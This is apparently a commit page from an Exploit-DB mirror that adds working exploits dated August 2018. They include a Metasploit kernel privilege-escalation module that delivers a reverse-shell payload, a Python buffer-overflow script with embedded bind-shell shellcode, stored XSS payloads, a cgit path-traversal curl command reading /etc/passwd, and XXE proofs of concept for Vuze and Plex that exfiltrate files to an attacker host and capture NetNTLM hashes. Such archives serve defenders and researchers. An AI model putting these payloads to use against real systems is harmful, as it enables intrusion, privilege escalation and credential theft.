bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-08-04

Browse source 
10 changes to exploits/shellcodes

FTPShell Client 5.24 - Add to Favorites Buffer Overflow
FTPShell Client 5.24 - 'Add to Favorites' Buffer Overflow

FTPShell Client 5.24 - Create NewFolder Local Buffer Overflow
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
Wedding Slideshow Studio 1.36 - Buffer Overflow
Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)

Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting
Auditor Website 2.0.1 - Cross-Site Scripting
Basic B2B Script 2.0.0 - Cross-Site Scripting
Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting
PHP Template Store Script 3.0.6 - Cross-Site Scripting
Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection
Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection
cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal

Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)
Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)
This commit is contained in:
Offensive Security 2018-08-04 05:01:46 +00:00
parent 9ea5e15796
commit 3aca47020d
12 changed files with 932 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

25
exploits/cgi/webapps/45148.txt Normal file
View file

@ -0,0 +1,25 @@
There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):
void cgit_clone_objects(void)
{
if (!ctx.qry.path) {
cgit_print_error_page(400, "Bad request", "Bad request");
return;
}
if (!strcmp(ctx.qry.path, "info/packs")) {
print_pack_info();
return;
}
send_file(git_path("objects/%s", ctx.qry.path));
}
send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.
ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring. To trigger this case:
$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

197
exploits/linux/local/45147.rb Executable file
View file

@ -0,0 +1,197 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Linux systems by abusing
UDP Fragmentation Offload (UFO).
This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros
based on Ubuntu, such as Linux Mint.
The target system must have unprivileged user namespaces enabled
and SMAP disabled.
Bypasses for SMEP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on various Ubuntu and Linux
Mint systems, including:
Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop;
Ubuntu 16.04 4.8.0-53-generic;
Linux Mint 17.3 4.4.0-89-generic;
Linux Mint 18 4.8.0-58-generic
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrey Konovalov', # Discovery and C exploit
'h00die', # Metasploit module
'Brendan Coles' # Metasploit module
],
'DisclosureDate' => 'Aug 10 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2017-1000112' ],
[ 'EDB', '43418' ],
[ 'BID', '100262' ],
[ 'URL', 'http://seclists.org/oss-sec/2017/q3/277' ],
[ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa' ],
[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112' ],
[ 'URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/' ],
[ 'URL', 'https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112' ]
],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
rm_f "#{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|45|47|51|53|57|59|62|63|64|66|67|70|71|72|75|78|79|81|83|87|89|81|89)-generic/ ||
version =~ /^4\.8\.0-(34|36|39|41|45|46|49|51|52|53|54|56|58)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
vprint_status 'Checking if SMAP is enabled ...'
if smap_enabled?
vprint_error 'SMAP is enabled'
return CheckCode::Safe
end
vprint_good 'SMAP is not enabled'
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('exploit.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit.out')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit ...'
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}"
output.each_line { |line| vprint_status line.chomp }
print_status "Cleaning up #{payload_path} and #{executable_path} ..."
rm_f executable_path
rm_f payload_path
end
end

40
exploits/php/webapps/45140.txt Normal file
View file

@ -0,0 +1,40 @@
*******************************************************************************************
# Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
# Date: 20.07.2018
# Site Titel : B2B Script
# Vendor Homepage: https://www.phpscriptsmall.com/
#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/
# Software Link: http://readymadeb2bscript.com/basic-b2b/
# Category: Web Application
# Version: 2.0.9
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
#Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-14541
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site (https://www.server.com/professional-b2b-script/ ).
2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on ...
3- Goto your mail and Verify it.
4-Come back to site and Login using your Verified Mail and Password.
6- When loged in ,goto My Profile => Edit Profile and fill the these Scripts in given parameter.
in FIRST NAME => "><img src=x onerror=prompt(/VIKAS/)>
in LAST NAME => "><img src=x onerror=prompt(/CHAUDHARY/)>
in ADDRESS 1 => "><img src=x onerror=prompt(/MYAIM/)>
in ADDRESS 2 => "><img src=x onerror=prompt(/GKAIM/)>
in CITY => "><img src=x onerror=prompt(/HRFP/)>
in STATE => "><img src=x onerror=prompt(/ETHICAL/)>
in COMPANY NAME => "><img src=x onerror=prompt(/HACKER/)>
Now click on SUBMIT and refresh the page
You will having popup of /VIKAS/ , /CHAUDHARY/ , / MYAIM/ . /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/ in you account..
***************************************************************************************

28
exploits/php/webapps/45141.txt Normal file
View file

@ -0,0 +1,28 @@
*******************************************************************************************
# Exploit Title: Entrepreneur Job Portal Script 3.0.1- has Stored XSS via Search bar and Location
# Date: 14.07.2018
# Site Titel : JOB SITE (Job Portal)
# Vendor Homepage: https://www.phpscriptsmall.com/
#Vendor Software: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/
# Software Link: http://freelancewebdesignerchennai.com/demo/job-portal/
# Category: Web Application
# Version: 3.0.1
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
#Published On: https://gkaim.com/cve-2018-14082-vikas-chaudhary/
# Tested on: Windows 10 -Firefox ,
# CVE: CVE-2018-14082
*****************************************************************************************
------------------------------------------------------ .
Proof of Concept:-
-------------------------------------------------------
1. Go to the site ( http://server.com/job-portal/ ) .
2- Click on REGISTER page (Register now) .
3- Register by giving you name ,mail and soo on...
4- Verify your mail
5- Come to side and login using your verified mail
6 -When you Loged in
In search bar (keywords, skills , Destination) paste "><svg/onload=alert(/VIKAS/)> and in location paste "><svg/onload=alert(/CHAUDHARY/)> and click on Search
7-You will have 2 popup=> /VIKAS/ and /CHAUDHARY/

32
exploits/php/webapps/45143.txt Normal file
View file

@ -0,0 +1,32 @@
*******************************************************************************************
# Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web: https://goglequeens.com
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site ( http://www.server.com/ ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign in using your Verified mail and Password.
5-Goto Setting => Personal information and paste these code in
Address line 1 => "><img src=x onerror=prompt(/SARAFRAZ/)>
Address Line 2 => "><img src=x onerror=prompt(/KHAN/)>
Bank name => "><img src=x onerror=prompt(/KING/)>
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>
and then click on Update Profile.
6-Now You will having popup of /SARAFRAZ/ , /KHAN/ , / KING/ and /GOOGLEQUEENS/ in you account..
***************************************************************************************

59
exploits/windows/local/45142.py Executable file
View file

@ -0,0 +1,59 @@
###########################################################################################
# Exploit Title: Socumsoft Wedding Slideshow Studio 1.36
# Date: 02.08.2018
# Exploit Author: Achilles
# Vendor Homepage: http://www.socusoft.com
# Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: Copy the contents of the file (Evil.txt)
# and paste in the License Name field click Register and BOOM
###########################################################################################
#!/usr/bin/env python
file = open("Evil.txt","wb")
junk = "\x41" * 512
nseh = "\x90\x90\xeb\x06" #jmp short 6
seh = "\x91\x54\x01\x10" #pop pop retn DVDPhotoData.dll
nops = "\x90" * 20
buf = ""
buf += "\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" #Bind shellcode port 4444
buf += "\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
buf += "\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
buf += "\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
buf += "\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
buf += "\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
buf += "\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
buf += "\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
buf += "\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
buf += "\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
buf += "\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
buf += "\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
buf += "\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
buf += "\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
buf += "\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
buf += "\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
buf += "\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
buf += "\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
buf += "\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
buf += "\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
buf += "\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
buf += "\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
buf += "\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
buf += "\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
buf += "\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
buf += "\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
buf += "\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
buf += "\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
buf += "\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
buf += "\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
buf += "\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
buf += "\xc8\x28\x1b\xd5\x3f\x51"
exploit = junk + nseh + seh + nops + buf
file.write(exploit)
file.close()

150
exploits/xml/webapps/45145.txt Normal file
View file

@ -0,0 +1,150 @@
Issue: Out-of-Band XXE in Vuze Bittorrent Client's SSDP Processing
Reserved CVE: CVE-2018-13417
# Vulnerability Overview
The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running Vuze.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
Multiple attempts to contact Vuze team resulted in no replies.
# Vulnerability Details
Attack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: Vuze Bittorrent Client's SSDP discovery / XML parsing
Operating Systems affected: Verified Windows 10 (likely all versions)
Vuze version affected: Tested on 5.7.6.0 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
Vuze, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
Vuze will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force Vuze to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When Vuze parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing Vuze to automatically access file paths and HTTP URLs.
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart Vuze. evil-ssdp will display messages like the following:
```
[M-SEARCH] New Host 192.168.1.100, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
[XML REQUEST] Host: 192.168.1.100, User-Agent: Azureus 5.7.6.0;Windows 10;Java 1.8.0_121
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/xxe.html
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/xxe.html
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running Vuze. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where Vuze is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where Vuze is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart Vuze. evil-ssdp will display messages like the following
```
[M-SEARCH] New Host 10.0.200.10, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
[XML REQUEST] Host: 192.168.1.100, User-Agent: Azureus 5.7.6.0;Windows 10;Java 1.8.0_121
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/data.dtd
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /ssdp/data.dtd
[EXFILTRATION] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /?exfiltrated=secretstuff!
[EXFILTRATION] Host: 192.168.1.100, User-Agent: Java/1.8.0_121
GET /?exfiltrated=secretstuff!
```

144
exploits/xml/webapps/45146.txt Normal file
View file

@ -0,0 +1,144 @@
Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing
Reserved CVE: CVE-2018-13415
# Vulnerability Overview
The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running Plex.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
Disclosed to Plex security team, pending resolution.
# Vulnerability Details
Attack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: Plex Media Server's SSDP discovery / parsing with libxml2
Operating Systems affected: Verified Windows 10 and Ubuntu Linux 18.10 (likely all versions)
Plex version affected: Tested on 1.13.2.5154 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
Plex, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
Plex will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force Plex Media Server to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When Plex parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing Plex to automatically access file paths and HTTP URLs. While our POC above uses an SMB share for attacking Windows clients, this could be modified to read local files into a variable and then pass that variable via HTTP to an attacker-controlled server. This type of attack could be used to read the contents of local files (like /etc/passwd in the Linux world).
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart Plex. evil-ssdp will display messages like the following:
```
[M-SEARCH] New Host 192.168.1.100, Service Type: ssdp:all
[XML REQUEST] Host: 192.168.1.100, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
GET /ssdp/device-desc.xml
[XML REQUEST] Host: 192.168.1.100, User-Agent: DVBLink
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running Plex. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where Plex is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where Plex is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart Plex. evil-ssdp will display messages like the following
```
[XML REQUEST] Host: 192.168.1.100, User-Agent: DVBLink
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 192.168.1.100, User-Agent: None
GET /ssdp/data.dtd
[EXFILTRATION] Host: 192.168.1.100, User-Agent: None
GET /?exfiltrated=secretstuff!
```

14
files_exploits.csv
View file

@ -9223,7 +9223,7 @@ id,file,description,date,author,type,platform,port
39132,exploits/windows/local/39132.py,"FTPShell Client 5.24 - Local Buffer Overflow",2015-12-30,hyp3rlinx,local,windows,
39134,exploits/linux/local/39134.txt,"DeleGate 9.9.13 - Local Privilege Escalation",2015-12-30,"Larry W. Cashdollar",local,linux,
39147,exploits/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",local,osx,
39159,exploits/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,local,windows,
39159,exploits/windows/local/39159.py,"FTPShell Client 5.24 - 'Add to Favorites' Buffer Overflow",2016-01-04,INSECT.B,local,windows,
39166,exploits/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)",2016-01-05,rebel,local,linux,
39207,exploits/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversals",2014-05-25,"Raphael Geissert",local,linux,
39214,exploits/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",local,linux,
@ -9241,7 +9241,7 @@ id,file,description,date,author,type,platform,port
40360,exploits/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",local,linux,3306
40774,exploits/linux/local/40774.sh,"Nagios 4.2.2 - Local Privilege Escalation",2016-11-18,"Vincent Malguy",local,linux,
39340,exploits/android/local/39340.cpp,"Google Android - 'sensord' Local Privilege Escalation",2016-01-27,s0m3b0dy,local,android,
39417,exploits/windows/local/39417.py,"FTPShell Client 5.24 - Create NewFolder Local Buffer Overflow",2016-02-04,"Arash Khazaei",local,windows,
39417,exploits/windows/local/39417.py,"FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow",2016-02-04,"Arash Khazaei",local,windows,
